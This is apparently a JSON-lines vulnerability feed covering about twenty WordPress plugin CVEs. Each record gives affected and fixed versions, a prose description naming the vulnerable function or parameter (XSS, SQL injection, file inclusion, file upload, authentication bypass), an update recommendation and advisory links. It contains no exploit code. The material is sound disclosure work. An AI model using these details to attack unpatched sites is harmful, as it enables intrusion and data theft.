{"CVE_ID":"CVE-2024-12588","slug":"auxin-elements","versionImpact":"2.17.2","versionEndExcluding":"2.17.3","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Staff widget in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.17.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/staff.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elements\\\/staff.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766cb6d0-1839-4d8c-819c-4e5dab408f6c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/766cb6d0-1839-4d8c-819c-4e5dab408f6c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12209","slug":"wp-health","versionImpact":"2.17.0","versionEndExcluding":"2.17.1","description":"The WP Umbrella: Update Backup Restore & Monitoring plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.17.0 via the 'filename' parameter of the 'umbrella-restore' action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.17.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-health\\\/tags\\\/v2.16.4\\\/src\\\/Actions\\\/RestoreRouter.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-health\\\/tags\\\/v2.16.4\\\/src\\\/Actions\\\/RestoreRouter.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202883%40wp-health&new=3202883%40wp-health&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3202883%40wp-health&new=3202883%40wp-health&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c74ce3e8-cab9-4cc6-a1ad-1e51f7268474?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9545","slug":"auxin-elements","versionImpact":"2.17.0","versionEndExcluding":"2.17.1","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aux_contact_box and aux_gmaps shortcodes in all versions up to, and including, 2.16.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.17.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.16.2\\\/includes\\\/elements\\\/contact-box.php#L432\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.16.2\\\/includes\\\/elements\\\/contact-box.php#L432\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.16.2\\\/includes\\\/elements\\\/gmap.php#L285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/tags\\\/2.16.2\\\/includes\\\/elements\\\/gmap.php#L285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65ee0ac8-3fa0-4a7d-a786-36a914242634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/65ee0ac8-3fa0-4a7d-a786-36a914242634?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8486","slug":"auxin-elements","versionImpact":"2.16.3","versionEndExcluding":"2.16.4","description":"The Shortcodes and extra features for Phlox theme plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018url\u2019 parameter in the Modern Heading and Icon Picker widgets in all versions up to, and including, 2.16.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.16.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09316a23-3a99-47f2-9c3f-795dc0a4a792?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/09316a23-3a99-47f2-9c3f-795dc0a4a792?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/heading-modern.php#L1168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/heading-modern.php#L1168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/heading-modern.php#L1205\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/heading-modern.php#L1205\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/icon.php#L397\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/auxin-elements\\\/trunk\\\/includes\\\/elementor\\\/widgets\\\/icon.php#L397\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161415\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161415\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10664","slug":"basepress","versionImpact":"2.16.3.3","versionEndExcluding":"2.16.3.4","description":"The Knowledge Base documentation & wiki plugin \u2013 BasePress Docs plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the basepress_db_posts_update() function in all versions up to, and including, 2.16.3.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the database.","recommendation":"Update to version 2.16.3.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201489%40basepress&new=3201489%40basepress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3201489%40basepress&new=3201489%40basepress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aa6f3c2-0e45-4243-a26d-ba1c702fbe11?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3aa6f3c2-0e45-4243-a26d-ba1c702fbe11?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9217","slug":"currency-switcher-woocommerce","versionImpact":"2.16.2","versionEndExcluding":"2.16.3","description":"The Currency Switcher for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.16.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.16.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/currency-switcher-woocommerce\\\/trunk\\\/includes\\\/functions\\\/alg-switcher-selector-functions.php#L139\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/currency-switcher-woocommerce\\\/trunk\\\/includes\\\/functions\\\/alg-switcher-selector-functions.php#L139\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3357892e-c047-406b-8914-018ea966e799?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3357892e-c047-406b-8914-018ea966e799?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4045","slug":"optinmonster","versionImpact":"2.16.1","versionEndExcluding":"2.16.2","description":"The Popup Builder by OptinMonster \u2013 WordPress Popups for Optins, Email Newsletters and Lead Generation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018campaign_id\u2019 parameter in versions up to, and including, 2.16.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.16.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4dfeb49-38d3-495d-af96-d67a29b339fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4dfeb49-38d3-495d-af96-d67a29b339fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optinmonster\\\/tags\\\/2.16.0\\\/OMAPI\\\/Elementor\\\/Widget.php#L532\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/optinmonster\\\/tags\\\/2.16.0\\\/OMAPI\\\/Elementor\\\/Widget.php#L532\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087905\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087905\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-46068","slug":"xqueue-maileon","versionImpact":"2.16.0","versionEndExcluding":"2.16.1","description":"Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in XQueue GmbH Maileon for WordPress plugin <=\u00a02.16.0 versions.","recommendation":"Update to version 2.16.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/xqueue-maileon\\\/wordpress-maileon-plugin-2-16-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/xqueue-maileon\\\/wordpress-maileon-plugin-2-16-0-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8803","slug":"bulk-noindex-nofollow-toolkit-by-mad-fish","versionImpact":"2.15","versionEndExcluding":"2.16","description":"The Bulk NoIndex & NoFollow Toolkit plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.15. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6e1cc0d-2c5f-4e34-bd19-d7c90cd4dff6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6e1cc0d-2c5f-4e34-bd19-d7c90cd4dff6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-noindex-nofollow-toolkit-by-mad-fish\\\/trunk\\\/inc\\\/bulk-noindex-toolkit-class.php?rev=3047303#L452\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bulk-noindex-nofollow-toolkit-by-mad-fish\\\/trunk\\\/inc\\\/bulk-noindex-toolkit-class.php?rev=3047303#L452\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157176\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3157176\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13365","slug":"security-malware-firewall","versionImpact":"2.149","versionEndExcluding":"2.150","description":"The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to arbitrary file uploads due to the plugin uploading and extracting .zip archives when scanning them for malware through the checkUploadedArchive() function  in all versions up to, and including, 2.149. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.150, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229205\\\/security-malware-firewall#file527\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3229205\\\/security-malware-firewall#file527\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fa30fa2-6c42-4e5f-a0b5-8711ce5d8121?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fa30fa2-6c42-4e5f-a0b5-8711ce5d8121?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12032","slug":"tourfic","versionImpact":"2.15.3","versionEndExcluding":"2.15.4","description":"The Tourfic \u2013 Ultimate Hotel Booking, Travel Booking & Apartment Booking WordPress Plugin | WooCommerce Booking plugin for WordPress is vulnerable to SQL Injection via the 'enquiry_id' parameter of the 'tf_enquiry_reply_email_callback' function in all versions up to, and including, 2.15.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.15.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tourfic\\\/tags\\\/2.14.1\\\/inc\\\/Core\\\/Enquiry.php#L990\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tourfic\\\/tags\\\/2.14.1\\\/inc\\\/Core\\\/Enquiry.php#L990\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207686\\\/tourfic\\\/trunk\\\/inc\\\/Core\\\/Enquiry.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3207686\\\/tourfic\\\/trunk\\\/inc\\\/Core\\\/Enquiry.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35eebcc8-a6bf-4cbb-9cc6-f49bd1625d6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35eebcc8-a6bf-4cbb-9cc6-f49bd1625d6b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10015","slug":"twitter-plugin","versionImpact":"2.14","versionEndExcluding":"2.15","description":"A vulnerability was found in BestWebSoft Twitter Plugin up to 2.14 on WordPress. It has been classified as problematic. Affected is the function twttr_settings_page of the file twitter.php of the component Settings Page. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 2.15 is able to address this issue. The name of the patch is a6d4659cbb2cbf18ccb0fb43549d5113d74e0146. It is recommended to upgrade the affected component. VDB-230154 is the identifier assigned to this vulnerability.","recommendation":"Update to version 2.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/twitter-plugin\\\/commit\\\/a6d4659cbb2cbf18ccb0fb43549d5113d74e0146\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/twitter-plugin\\\/commit\\\/a6d4659cbb2cbf18ccb0fb43549d5113d74e0146\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230154\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.230154\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.230154\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.230154\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10570","slug":"security-malware-firewall","versionImpact":"2.145","versionEndExcluding":"2.145.1","description":"The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized SQL Injection due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 2.145, as well as insufficient input sanitization and validation. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.145.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-malware-firewall\\\/tags\\\/2.145\\\/lib\\\/CleantalkSP\\\/Common\\\/RemoteCalls.php#L59\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/security-malware-firewall\\\/tags\\\/2.145\\\/lib\\\/CleantalkSP\\\/Common\\\/RemoteCalls.php#L59\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13562","slug":"jc-importer","versionImpact":"2.14.5","versionEndExcluding":"2.14.6","description":"The Import WP \u2013 Export and Import CSV and XML files to WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.14.5 via the uploads directory. This makes it possible for unauthenticated attackers to extract sensitive data  stored insecurely in the \/wp-content\/uploads\/ directory which can contain information like imported or local user data and files.","recommendation":"Update to version 2.14.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226495\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3226495\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6d69ffd-bb39-4fcc-9444-27d1a901e7c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d6d69ffd-bb39-4fcc-9444-27d1a901e7c9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2332","slug":"wp-ultimate-exporter","versionImpact":"2.13","versionEndExcluding":"2.14","description":"The Export All Posts, Products, Orders, Refunds & Users plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.13 via deserialization of untrusted input in the 'returnMetaValueAsCustomerInput' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"Update to version 2.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-exporter\\\/trunk\\\/exportExtensions\\\/ExportExtension.php#L3332\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-exporter\\\/trunk\\\/exportExtensions\\\/ExportExtension.php#L3332\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257504\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257504\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9546ab46-737c-4bd3-9542-8ab1b776b3ea?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9546ab46-737c-4bd3-9542-8ab1b776b3ea?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12919","slug":"paid-member-subscriptions","versionImpact":"2.13.7","versionEndExcluding":"2.13.8","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.13.7. This is due to the pms_pb_payment_redirect_link function using the user-controlled value supplied via the 'pms_payment_id' parameter to authenticate users without any further identity validation. This makes it possible for unauthenticated attackers with knowledge of a valid payment ID to log in as any user who has made a purchase on the targeted site.","recommendation":"Update to version 2.13.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214706\\\/paid-member-subscriptions\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3214706\\\/paid-member-subscriptions\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3a4fa4d-a7d2-4890-b0f5-5fe69bc5e7ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3a4fa4d-a7d2-4890-b0f5-5fe69bc5e7ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11291","slug":"paid-member-subscriptions","versionImpact":"2.13.4","versionEndExcluding":"2.13.5","description":"The Paid Membership Subscriptions \u2013 Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.4 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.","recommendation":"Update to version 2.13.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206206\\\/paid-member-subscriptions\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206206\\\/paid-member-subscriptions\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e207f1a3-2ca5-46d1-91a9-89652451266c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e207f1a3-2ca5-46d1-91a9-89652451266c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13925","slug":"klarna-checkout-for-woocommerce","versionImpact":"2.13.4","versionEndExcluding":"2.13.5","description":"The Klarna Checkout for WooCommerce WordPress plugin before 2.13.5 exposes an unauthenticated WooCommerce Ajax endpoint that allows an attacker to flood the log files with data at the maximum size allowed for a POST parameter per request. This can result in rapid consumption of disk space, potentially filling the entire disk.","recommendation":"Update to version 2.13.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6aebb52f-d74a-4043-86c4-c24579f24ef4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6aebb52f-d74a-4043-86c4-c24579f24ef4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7782","slug":"bit-form","versionImpact":"2.13.4","versionEndExcluding":"2.13.5","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the iconRemove function in versions 2.0 to 2.13.4. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","recommendation":"Update to version 2.13.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4da8ead-326f-4c93-b56d-8bfa643d7906?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4da8ead-326f-4c93-b56d-8bfa643d7906?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.0\\\/includes\\\/Admin\\\/AdminAjax.php#L1271\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.13.0\\\/includes\\\/Admin\\\/AdminAjax.php#L1271\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6123","slug":"bit-form","versionImpact":"2.12.3","versionEndExcluding":"2.13.4","description":"The Bit Form plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'iconUpload' function in all versions up to, and including, 2.12.2. This makes it possible for authenticated attackers, with administrator-level and above permissions, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1b255f-d775-4bd5-892e-42bf82dd5632?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d1b255f-d775-4bd5-892e-42bf82dd5632?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.12.2\\\/includes\\\/Admin\\\/AdminAjax.php#L1176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-form\\\/tags\\\/2.12.2\\\/includes\\\/Admin\\\/AdminAjax.php#L1176\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10703","slug":"registrations-for-the-events-calendar","versionImpact":"2.13.3","versionEndExcluding":"2.13.4","description":"The Registrations for the Events Calendar  WordPress plugin before 2.13.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.13.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5601ac03-09e4-4b4e-b03e-98323bd36dba\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5601ac03-09e4-4b4e-b03e-98323bd36dba\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7780","slug":"bit-form","versionImpact":"2.13.9","versionEndExcluding":"2.13.10","description":"The Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder plugin for WordPress is vulnerable to generic SQL Injection via the id parameter in versions 2.0 to 2.13.9 due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.13.10, or a newer patched 